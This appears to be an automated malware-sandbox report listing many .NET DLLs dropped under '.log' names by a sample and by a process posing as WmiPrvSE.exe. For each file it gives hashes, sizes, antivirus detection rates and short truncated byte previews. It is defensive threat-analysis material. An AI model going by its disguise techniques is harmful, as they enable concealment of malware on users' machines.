SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\KebpbcGE.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\KrawoXqF.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\LALnLPjB.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\LsLFRydK.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\MFWOLyZB.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 24%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\MPcmOdeg.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 13%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\MbDxwcVz.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\MsfvwPWb.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\NZNelUXb.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\NhwwQEyh.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\OIrVAZQe.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\OLjDJquB.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\OPbwNHKO.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\OQhlWUKC.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\OdqVYMoD.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\OzPMecrY.log

Download File

Process:	C:\Users\user\Desktop\9D7RwuJrth.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\QJwUIRwB.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\QLdDWJUZ.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\QfdDtvsy.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\QfjBlGMR.log

Download File

Process:	C:\Users\user\Desktop\9D7RwuJrth.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\QnTUQpnW.log

Download File

Process:	C:\Users\user\Desktop\9D7RwuJrth.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 24%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\RUOvtANV.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
